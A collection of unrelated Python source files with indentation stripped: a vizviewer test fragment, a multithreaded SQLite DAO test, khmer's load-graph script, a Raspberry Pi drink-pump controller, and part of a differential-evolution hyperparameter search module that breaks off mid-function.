with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
f.write(json_script)
v = Viewer(f.name, once=True)
v.run()
try:
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
self.assertTrue(resp.code == 200)
resp = urllib.request.urlopen("http://127.0.0.1:9001/file_info")
self.assertEqual(json.loads(resp.read().decode("utf-8")), {})
resp = urllib.request.urlopen("http://127.0.0.1:9001/localtrace")
self.assertEqual(json.loads(resp.read().decode("utf-8")), json.loads(json_script))
except Exception:
v.stop()
raise
finally:
v.process.wait(timeout=20)
finally:
os.remove(f.name)
@unittest.skipIf(sys.platform == "darwin", "MacOS has a high security check for multiprocessing")
def test_browser(self):
html = '<html></html>'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".html", delete=False) as f:
f.write(html)
with unittest.mock.patch.object(sys, "argv", ["vizviewer", "--once", f.name]):
with unittest.mock.patch.object(webbrowser, "open_new_tab", MockOpen(html)) as mock_obj:
viewer_main()
mock_obj.p.join()
self.assertEqual(mock_obj.p.exitcode, 0)
finally:
os.remove(f.name)
def test_invalid(self):
self.template(["vizviewer", "do_not_exist.json"], success=False, expected_output_file=None)
self.template(["vizviewer", "README.md"], success=False, expected_output_file=None)
|
main.py
|
# -*- coding: utf-8 -*-
""" Test code to test multithread handling of DAO class
The aim is to provide a DAO coherent with multithread access
"""
import threading
from dao import DaoTestWrapper, DummyLogger, shutting_down, DaoTest
logger = DummyLogger()
TEST_OLD_CLASS = False # switch to True to test the old class's behavior
THREAD_COUNT_3 = 9 # controls the number of threads started: three per iteration, (THREAD_COUNT_3 - 1) * 3 in total
if not TEST_OLD_CLASS:
dtw = DaoTestWrapper() # common instance should be stored somewhere
else:
dtw = DaoTest() # old class
def select(id_):
res = dtw.select_sql("SELECT * FROM pytest WHERE id="+str(id_))
logger.info("【MAIN】Result:" + str(res))
if res is False: # presumably an SQLite Error
logger.info("\n!!!!! CHECK ABOVE FOR SQLITE ERROR !!! (Thread id: "+str(threading.current_thread().ident)+")\n")
return res
def select_1():
ret = select(1)
if ret != [{'id': 1, 'name': 'Name-A'}]:
logger.info("(ERROR: expected [{'id': 1, 'name': 'Name-A'}] got "+str(ret)+")\n\n")
def select_2():
ret = select(2)
if ret != [{'id': 2, 'name': 'Name-B'}]:
logger.info("(ERROR: expected [{'id': 2, 'name': 'Name-B'}] got "+str(ret)+")\n\n")
def select_3():
ret = select(3)
if ret != [{'id': 3, 'name': 'Name-C'}]:
logger.info("(ERROR: expected [{'id': 3, 'name': 'Name-C'}] got "+str(ret)+")\n\n")
# ### main process start ###
DummyLogger.log = False
dtw.start()
dtw.initialize()
dtw.execute("DROP TABLE IF EXISTS pytest")
dtw.execute("create table pytest (id INTEGER PRIMARY KEY NOT NULL, name VARCHAR(64))")
dtw.execute("insert into pytest (id, name) values (1,\"Name-A\")")
dtw.execute("insert into pytest (id, name) values (2,\"Name-B\")")
dtw.execute("insert into pytest (id, name) values (3,\"Name-C\")")
DummyLogger.log = True
# SELECT from main thread
logger.info("【MAIN】Calling SELECT from main thread:")
select(1)
# SELECT from sub threads
thr_list = []
for i in range(1, THREAD_COUNT_3):
thr_list.append(threading.Thread(target=select_1))
thr_list.append(threading.Thread(target=select_2))
thr_list.append(threading.Thread(target=select_3))
logger.info("【MAIN】Calling SELECT from sub threads:")
for thr in thr_list:
thr.start()
for thr in thr_list:
thr.join()
# shutdown
shutting_down.set()
|
load-graph.py
|
#!/usr/bin/python2.7
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2014. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
# pylint: disable=invalid-name,missing-docstring
"""
Build a graph from the given sequences, save in <htname>.
% python scripts/load-graph.py <htname> <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
import sys
import threading
import khmer
from khmer.khmer_args import build_hashbits_args
from khmer.khmer_args import (report_on_config, info)
from khmer.threading_args import add_threading_args
from khmer.file import check_file_status, check_space
from khmer.file import check_space_for_hashtable
def get_parser():
parser = build_hashbits_args(descr="Load sequences into the compressible "
"graph format plus optional tagset.")
add_threading_args(parser)
parser.add_argument('--no-build-tagset', '-n', default=False,
action='store_true', dest='no_build_tagset',
help='Do NOT construct tagset while loading sequences')
parser.add_argument('output_filename',
metavar='output_presence_table_filename', help='output'
' k-mer presence table filename.')
parser.add_argument('input_filenames', metavar='input_sequence_filename',
nargs='+', help='input FAST[AQ] sequence filename')
parser.add_argument('--report-total-kmers', '-t', action='store_true',
help="Prints the total number of k-mers to stderr")
return parser
def main():
info('load-graph.py', ['graph'])
args = get_parser().parse_args()
report_on_config(args, hashtype='hashbits')
base = args.output_filename
filenames = args.input_filenames
n_threads = int(args.n_threads)
for _ in args.input_filenames:
check_file_status(_)
check_space(args.input_filenames)
check_space_for_hashtable(float(args.n_tables * args.min_tablesize) / 8.)
print 'Saving k-mer presence table to %s' % base
print 'Loading kmers from sequences in %s' % repr(filenames)
if args.no_build_tagset:
print 'We WILL NOT build the tagset.'
else:
print 'We WILL build the tagset (for partitioning/traversal).'
print 'making k-mer presence table'
htable = khmer.new_hashbits(args.ksize, args.min_tablesize, args.n_tables)
if args.no_build_tagset:
target_method = htable.consume_fasta_with_reads_parser
else:
target_method = htable.consume_fasta_and_tag_with_reads_parser
config = khmer.get_config()
config.set_reads_input_buffer_size(n_threads * 64 * 1024)
for _, filename in enumerate(filenames):
rparser = khmer.ReadParser(filename, n_threads)
threads = []
print 'consuming input', filename
for _ in xrange(n_threads):
cur_thrd = threading.Thread(target=target_method, args=(rparser, ))
threads.append(cur_thrd)
cur_thrd.start()
for thread in threads:
thread.join()
if args.report_total_kmers:
print >> sys.stderr, 'Total number of k-mers: {0}'.format(
htable.n_occupied())
print 'saving k-mer presence table in', base + '.pt'
htable.save(base + '.pt')
if not args.no_build_tagset:
print 'saving tagset in', base + '.tagset'
htable.save_tagset(base + '.tagset')
info_fp = open(base + '.info', 'w')
info_fp.write('%d unique k-mers' % htable.n_unique_kmers())
fp_rate = khmer.calc_expected_collisions(htable)
print 'fp rate estimated to be %1.3f' % fp_rate
if fp_rate > 0.15: # 0.18 is ACTUAL MAX. Do not change.
print >> sys.stderr, "**"
print >> sys.stderr, ("** ERROR: the graph structure is too small for "
"this data set. Increase table size/# tables.")
print >> sys.stderr, "**"
sys.exit(1)
if __name__ == '__main__':
main()
# vim: set ft=python ts=4 sts=4 sw=4 et tw=79:
|
bartender.py
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
import time
import sys
import RPi.GPIO as GPIO
import json
import traceback
import threading
import textwrap
import subprocess
import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from dotstar import Adafruit_DotStar
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 200
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 200
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/500.0
# Raspberry Pi pin configuration:
RST = 14
# Note the following are only used with SPI:
DC = 15
SPI_PORT = 0
SPI_DEVICE = 0
#Fontsize and Font Type Settings
FONTSIZE = 15
FONTFILE = "InputSans-Regular.ttf"
#Wraps Text for better view on OLED screen. 13 is best for 128x64
WRAPPER = textwrap.TextWrapper(width=13)
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
# configure interrupts for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
spi_bus = 0
spi_device = 0
#Load the display driver. Note: 128_64 is the display size; change it if your setup differs.
self.led = disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000)) # Change rows & cols values depending on your display dimensions.
# Initialize library.
self.led.begin()
# Clear display.
self.led.clear()
self.led.display()
# Create image buffer.
# Make sure to create image with mode '1' for 1-bit color.
self.image = Image.new('1', (self.screen_width, self.screen_height))
# Load default font.
#self.font = ImageFont.load_default()
self.font = ImageFont.truetype(FONTFILE, FONTSIZE)
# Create drawing object.
self.draw = ImageDraw.Draw(self.image)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
self.numpixels = NUMBER_NEOPIXELS # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = NEOPIXEL_DATA_PIN
clockpin = NEOPIXEL_CLOCK_PIN
self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
#Commented out as long as no LED strip is attached.
#self.strip.begin() # Initialize pins for output
self.strip.setBrightness(NEOPIXEL_BRIGHTNESS) # Limit brightness to ~1/4 duty cycle
# turn everything off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
print "Done initializing"
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
# adds an option that shuts down the rpi
configuration_menu.addOption(MenuItem('shutdown', 'Shutdown'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
elif(menuItem.type == "shutdown"):
self.shutdown()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
def shutdown(self):
shutdowntext = "Shutdown takes 10 seconds. Bye!"
self.led.clear()
self.draw.rectangle((0,0,self.screen_width,self.screen_height), outline=0, fill=0)
words_list = WRAPPER.wrap(text=shutdowntext)
TextNew = ''
for ii in words_list[:-1]:
TextNew = TextNew + ii + "\n"
TextNew += words_list[-1]
self.draw.text((0,10),str(TextNew), font=self.font, fill=255)
self.led.image(self.image)
self.led.display()
time.sleep(5);
#Clean shutdown device
subprocess.Popen(['shutdown','-h','now'])
def displayMenuItem(self, menuItem):
print menuItem.name
self.led.clear()
self.draw.rectangle((0,0,self.screen_width,self.screen_height), outline=0, fill=0)
words_list = WRAPPER.wrap(text=menuItem.name)
MenuItemNew = ''
for ii in words_list[:-1]:
MenuItemNew = MenuItemNew + ii + "\n"
MenuItemNew += words_list[-1]
self.draw.text((0,10),str(MenuItemNew), font=self.font, fill=255)
self.led.image(self.image)
self.led.display()
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while getattr(t, "do_run", True):
self.strip.setPixelColor(head, color) # Turn on 'head' pixel
self.strip.setPixelColor(tail, 0) # Turn off 'tail'
self.strip.show() # Refresh strip
time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
head += 1 # Advance head position
if(head >= self.numpixels): # Off end of strip?
head = 0 # Reset to start
color >>= 8 # Red->green->blue->black
if(color == 0): color = 0xFF0000 # If black, reset to red
tail += 1 # Advance tail position
if(tail >= self.numpixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0xFF0000)
self.strip.show()
time.sleep(5)
# turn lights off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
for x in range(1, 101):
self.led.clear()
self.draw.rectangle((0,0,self.screen_width,self.screen_height), outline=0, fill=0)
self.updateProgressBar(x, y=35)
self.led.image(self.image)
self.led.display()
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
lightsThread = threading.Thread(target=self.cycleLights)
lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
lightsThread.do_run = False
lightsThread.join()
# show the ending sequence lights
self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
# reenable interrupts
# self.startInterrupts()
self.running = False
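# Illustrative sketch (editor's addition; the recipe values and the unit of
# FLOW_RATE are assumptions): for a recipe such as
#
#   ingredients = {"gin": 50, "tonic": 150}
#
# each matching pump gets its own thread and pours for amount * FLOW_RATE
# seconds (50 * FLOW_RATE for gin, 150 * FLOW_RATE for tonic). All pumps run
# concurrently and the progress bar is driven by maxTime, the longest of the
# individual pour times.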
def left_btn(self, ctx):
print("LEFT_BTN pressed")
if not self.running:
self.running = True
self.menuContext.advance()
print("Finished processing button press")
self.running = False
def right_btn(self, ctx):
print("RIGHT_BTN pressed")
if not self.running:
self.running = True
self.menuContext.select()
print("Finished processing button press")
self.running = 2
print("Starting button timeout")
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.draw.point((w + x, y), fill=255)
self.draw.point((w + x, y + height), fill=255)
for h in range(0, height):
self.draw.point((x, h + y), fill=255)
self.draw.point((self.screen_width-x, h + y), fill=255)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.draw.point((x + p_loc, h + y), fill=255)
def run(self):
self.startInterrupts()
# main loop
try:
try:
while True:
letter = raw_input(">")
if letter == "l":
self.left_btn(False)
if letter == "r":
self.right_btn(False)
except EOFError:
while True:
time.sleep(0.1)
if self.running not in (True,False):
self.running -= 0.1
if self.running <= 0:  # use <= so float rounding from the 0.1 decrements cannot skip past zero
self.running = False
print("Finished button timeout")
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
differential_evolution.py
|
"""
Differential evolution implementation
"""
import random
from collections import OrderedDict
import os
from hops import hdfs, tensorboard, devices, util
from hops.experiment_impl.util import experiment_utils
from hops.experiment import Direction
import threading
import six
import time
import copy
import json
import sys
objective_function=None
spark=None
opt_key=None
diff_evo=None
cleanup=None
fs_handle=None
local_logdir_bool=False
generation_id = 0
run_id = 0
def _get_all_accuracies(tensorboard_hdfs_logdir, args_dict, number_params):
"""
Retrieves all accuracies from the parallel executions (each execution writes
its result to a separate file, one per hyperparameter combination passed to
the wrapper function)
Args:
:tensorboard_hdfs_logdir:
:args_dict:
:number_params:
Returns:
"""
results=[]
# Important: this must use the same parameter ordering as the _parse_to_dict function
population_dict = diff_evo.get_dict()
global run_id
for i in range(number_params):
path_to_log= tensorboard_hdfs_logdir + "/generation." + str(generation_id - 1) + "/"
for k in population_dict:
path_to_log+=k+'='+str(args_dict[k][i])+ '&'
path_to_log = path_to_log[:(len(path_to_log) -1)]
path_to_log = path_to_log + '/.metric'
with hdfs.open_file(path_to_log, flags="r") as fi:
metric = fi.read()
fi.close()
results.append(metric)
return [float(res) for res in results]
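# Illustrative path layout (editor's sketch, following how path_to_log is
# built above): for a search space with hypothetical parameters "lr" and
# "dropout", each metric would be read from a file such as
#
#   <tensorboard_hdfs_logdir>/generation.2/lr=0.01&dropout=0.3/.metric
#
# i.e. one ".metric" file per hyperparameter combination, grouped under the
# generation that produced it, with parameters in population-dict order.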
def _execute_all(population_dict, name="no-name"):
"""
Executes the wrapper function with all values of population_dict in parallel.
Returns a list of accuracies (or whichever metric the wrapper returns) in the
same order as in the population_dict.
Args:
:population_dict:
:name:
Returns:
"""
initial_pop = copy.deepcopy(population_dict)
number_hp_combinations=[len(v) for v in population_dict.values()][0]
# directory for current generation
# Do not run hyperparameter combinations that are duplicated
# Find all duplicates and delete them
keys = population_dict.keys()
i=0
while i < number_hp_combinations:
duplicate_entries = _duplicate_entry(i, keys, population_dict, number_hp_combinations)
if len(duplicate_entries) > 0:
# sort entries, delete descending
for index in duplicate_entries:
for key in keys:
population_dict[key].pop(index)
i=0
number_hp_combinations = [len(v) for v in population_dict.values()][0]
else:
i+=1
tensorboard_hdfs_logdir = _evolutionary_launch(spark, objective_function, population_dict, name=name)
return _get_all_accuracies(tensorboard_hdfs_logdir, initial_pop, [len(v) for v in initial_pop.values()][0])
def _duplicate_entry(i, keys, population, len):
"""
Args:
:i:
:keys:
:population:
:len:
Returns:
"""
hp_combinations = []
duplicate_indices = []
for val in range(len):
entry=''
for key in keys:
entry += str(population[key][val]) + '='
hp_combinations.append(entry)
to_find = hp_combinations[i]
#get the duplicate indices
for y in range(len):
if hp_combinations[y] == to_find and y != i:
duplicate_indices.insert(0, y)
return duplicate_indices
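# Worked example (editor's addition): with
#
#   population = {"lr": [0.1, 0.2, 0.1], "batch": [32, 64, 32]}
#
# the flattened combinations are "0.1=32=", "0.2=64=", "0.1=32=", so
# _duplicate_entry(0, population.keys(), population, 3) returns [2]: the
# index of the later duplicate of combination 0, which the caller then drops.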
class DifferentialEvolution:
_types = ['float', 'int', 'cat']
_generation = 0
_scores = []
_ordered_population_dict = []
_param_names = []
def __init__(self, objective_function, parbounds, types, ordered_dict, direction=Direction.MAX, generations=10, population=10, mutation=0.5, crossover=0.7, name="no-name"):
"""
Args:
:objective_function:
:parbounds:
:types:
:ordered_dict:
:direction:
:generations:
:population:
:mutation:
:crossover:
:name:
"""
self.objective_function = objective_function
self.parbounds = parbounds
self.direction = direction
self.types = types
self.generations = generations
self.n = population
self.F = mutation
self.CR = crossover
self._ordered_population_dict = ordered_dict
self.name = name
global generation_id
generation_id = 0
self._param_names = []
for entry in ordered_dict:
self._param_names.append(entry)
#self.m = -1 if maximize else 1
# run differential evolution algorithms
def _solve(self, root_dir):
"""
Args:
:root_dir:
Returns:
"""
# initialise generation based on individual representation
population, bounds = self._population_initialisation()
global fs_handle
fs_handle = hdfs.get_fs()
global run_id
new_gen_best_param = None
new_gen_best = None
for _ in range(self.generations):
donor_population = self._mutation(population, bounds)
trial_population = self._recombination(population, donor_population)
population = self._selection(population, trial_population)
new_gen_avg = sum(self._scores)/self.n
if self.direction.upper() == Direction.MAX:
new_gen_best = max(self._scores)
elif self.direction.upper() == Direction.MIN:
new_gen_best = min(self._scores)
else:
raise ValueError('invalid direction: ' + self.direction)
new_gen_best_param = self._parse_back(population[self._scores.index(new_gen_best)])
index = 0
for name in self._param_names:
new_gen_best_param[index] = name + "=" + str(new_gen_best_param[index])
index += 1
print("Generation " + str(self._generation) + " || " + "average metric: " + str(new_gen_avg) \
+ ", best metric: " + str(new_gen_best) + ", best parameter combination: " + str(new_gen_best_param) + "\n")
if cleanup:
hdfs.rmr(root_dir + '/generation.' + str(self._generation-1))
parsed_back_population = []
for indiv in population:
parsed_back_population.append(self._parse_back(indiv))
return new_gen_best_param, new_gen_best
# define bounds of each individual depending on type
def _individual_representation(self):
"""
Returns:
"""
bounds = []
for index, item in enumerate(self.types):
b =()
# if categorical then take bounds from 0 to number of items
if item == self._types[2]:
b = (0, int(len(self.parbounds[index]) - 1))
# if float/int then take given bounds
else:
b = self.parbounds[index]
bounds.append(b)
return bounds
# initialise population
def _population_initialisation(self):
"""
Returns:
"""
population = []
num_parameters = len(self.parbounds)
for i in range(self.n):
indiv = []
bounds = self._individual_representation()
for i in range(num_parameters):
indiv.append(random.uniform(bounds[i][0], bounds[i][1]))
indiv = self._ensure_bounds(indiv, bounds)
population.append(indiv)
return population, bounds
# ensure that any mutated individual is within bounds
def _ensure_bounds(self, indiv, bounds):
"""
Args:
:indiv:
:bounds:
Returns:
"""
indiv_correct = []
for i in range(len(indiv)):
par = indiv[i]
# check if param is within bounds
lowerbound = bounds[i][0]
upperbound = bounds[i][1]
if par < lowerbound:
par = lowerbound
elif par > upperbound:
par = upperbound
# check if param needs rounding
if self.types[i] != 'float':
par = int(round(par))
indiv_correct.append(par)
return indiv_correct
# create donor population based on mutation of three vectors
def _mutation(self, population, bounds):
"""
Args:
:population:
:bounds:
Returns:
"""
donor_population = []
for i in range(self.n):
indiv_indices = list(range(0, self.n))
indiv_indices.remove(i)
candidates = random.sample(indiv_indices, 3)
x_1 = population[candidates[0]]
x_2 = population[candidates[1]]
x_3 = population[candidates[2]]
# substracting the second from the third candidate
x_diff = [x_2_i - x_3_i for x_2_i, x_3_i in zip(x_2, x_3)]
donor_vec = [x_1_i + self.F*x_diff_i for x_1_i, x_diff_i in zip (x_1, x_diff)]
donor_vec = self._ensure_bounds(donor_vec, bounds)
donor_population.append(donor_vec)
return donor_population
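# Worked example (editor's addition): with F = 0.5 and sampled individuals
# x_1 = [1.0, 4.0], x_2 = [2.0, 6.0], x_3 = [0.0, 2.0], the donor vector is
#
#   x_1 + F * (x_2 - x_3) = [1.0 + 0.5*2.0, 4.0 + 0.5*4.0] = [2.0, 6.0]
#
# which _ensure_bounds then clips back into range (and rounds for int or
# categorical parameters).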
# recombine donor vectors according to crossover probability
def _recombination(self, population, donor_population):
"""
Args:
:population:
:donor_population:
Returns:
"""
trial_population = []
for k in range(self.n):
target_vec = population[k]
donor_vec = donor_population[k]
trial_vec = []
for p in range(len(self.parbounds)):
crossover = random.random()
# if random number is below set crossover probability do recombination
if crossover <= self.CR:
trial_vec.append(donor_vec[p])
else:
trial_vec.append(target_vec[p])
trial_population.append(trial_vec)
return trial_population
# select the best individuals from each generation
def _selection(self, population, trial_population):
"""
Args:
:population:
:trial_population:
Returns:
"""
# Calculate trial vectors and target vectors and select next generation
if self._generation == 0:
parsed_population = []
for target_vec in population:
parsed_target_vec = self._parse_back(target_vec)
parsed_population.append(parsed_target_vec)
parsed_population = self._parse_to_dict(parsed_population)
self._scores = self.objective_function(parsed_population, name=self.name)
if self.direction.upper() == Direction.MAX:
new_gen_best = max(self._scores)
elif self.direction.upper() == Direction.MIN:
new_gen_best = min(self._scores)
else:
raise ValueError('invalid direction: ' + self.direction)
new_gen_best_param = self._parse_back(population[self._scores.index(new_gen_best)])
index = 0
for name in self._param_names:
new_gen_best_param[index] = name + "=" + str(new_gen_best_param[index])
index += 1
parsed_trial_population = []
for index, trial_vec in enumerate(trial_population):
parsed_trial_vec = self._parse_back(trial_vec)
parsed_trial_population.append(parsed_trial_vec)
parsed_trial_population = self._parse_to_dict(parsed_trial_population)
trial_population_scores = self.objective_function(parsed_trial_population, name=self.name)
for i in range(self.n):
trial_vec_score_i = trial_population_scores[i]
target_vec_score_i = self._scores[i]
if self.direction.upper() == Direction.MAX:
if trial_vec_score_i > target_vec_score_i:
self._scores[i] = trial_vec_score_i
population[i] = trial_population[i]
elif self.direction.upper() == Direction.MIN:
if trial_vec_score_i < target_vec_score_i:
self._scores[i] = trial_vec_score_i
population[i] = trial_population[i]
self._generation += 1
return population
# parse the converted values back to original
def _parse_back(self, individual):
"""
Args:
:individual:
Returns:
"""
original_representation = []
for index, parameter in enumerate(individual):
if self.types[index] == self._types[2]:
original_representation.append(self.parbounds[index][parameter])
else:
original_representation.append(parameter)
return original_representation
# for parallelization purposes the population can be converted from a list to a dictionary format;
# the user only has to add the parameters they want to optimize to population_dict
def _parse_to_dict(self, population):
"""
Args:
:population:
Returns:
"""
# reset entries
for entry in self._ordered_population_dict:
self._ordered_population_dict[entry] = []
for indiv in population:
index = 0
for param in self._param_names:
self._ordered_population_dict[param].append(indiv[index])
index = index + 1
return self._ordered_population_dict
def get_dict(self):
return self._ordered_population_dict
def _run(train_fn, search_dict, direction = Direction.MAX, generations=4, population=6, mutation=0.5, crossover=0.7, cleanup_generations=False, local_logdir=False, name="no-name", optimization_key=None):
"""
Args:
:train_fn:
:search_dict:
:direction:
:generations:
:population:
:mutation:
:crossover:
:cleanup_generations:
:local_logdir:
:name:
:optimization_key:
Returns:
"""
global run_id
global local_logdir_bool
local_logdir_bool = local_logdir
global spark
spark = util._find_spark()
global objective_function
objective_function = train_fn
global cleanup
cleanup = cleanup_generations
global opt_key
opt_key = optimization_key
argcount = six.get_function_code(train_fn).co_argcount
arg_names = six.get_function_code(train_fn).co_varnames
ordered_arr = []
app_id = spark.sparkContext.applicationId
arg_lists = list(search_dict.values())
for i in range(len(arg_lists)):
if len(arg_lists[i]) != 2:
raise ValueError('Boundary list must contain exactly two elements, [lower_bound, upper_bound] for float/int '
'or [category1, category2] in the case of strings')
assert population > 3, 'population should be greater than 3'
assert generations > 1, 'generations should be greater than 1'
argIndex = 0
while argcount != 0:
ordered_arr.append((arg_names[argIndex], search_dict[arg_names[argIndex]]))
argcount = argcount - 1
argIndex = argIndex + 1
ordered_dict = OrderedDict(ordered_arr)
bounds_list = []
types_list = []
for entry in ordered_dict:
bounds_list.append((ordered_dict[entry][0], ordered_dict[entry][1]))
if isinstance(ordered_dict[entry][0], int):
types_list.append('int')
elif isinstance(ordered_dict[entry][0], float):
types_list.append('float')
else:
types_list.append('cat')
global diff_evo
diff_evo = DifferentialEvolution(_execute_all,
bounds_list,
types_list,
ordered_dict,
direction=direction,
generations=generations,
population=population,
crossover=crossover,
mutation=mutation,
name=name)
root_dir = experiment_utils._get_experiments_dir() + "/" + str(app_id) + "_" + str(run_id)
best_param, best_metric = diff_evo._solve(root_dir)
param_string = ''
for hp in best_param:
param_string = param_string + hp + '&'
param_string = param_string[:-1]
best_exp_logdir, return_dict = _get_best(str(root_dir), direction)
print('Finished Experiment \n')
return best_exp_logdir, experiment_utils._get_params_dict(best_exp_logdir), best_metric, return_dict
def _evolutionary_launch(spark, train_fn, args_dict, name="no-name"):
""" Run the wrapper function with each hyperparameter combination as specified by the dictionary
Args:
:spark: SparkSession object
:train_fn: The TensorFlow function to run
:args_dict: (optional) A dictionary containing hyperparameter values to insert as arguments for each TensorFlow job
"""
global run_id
sc = spark.sparkContext
app_id = str(sc.applicationId)
arg_lists = list(args_dict.values())
num_executions = len(arg_lists[0])
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
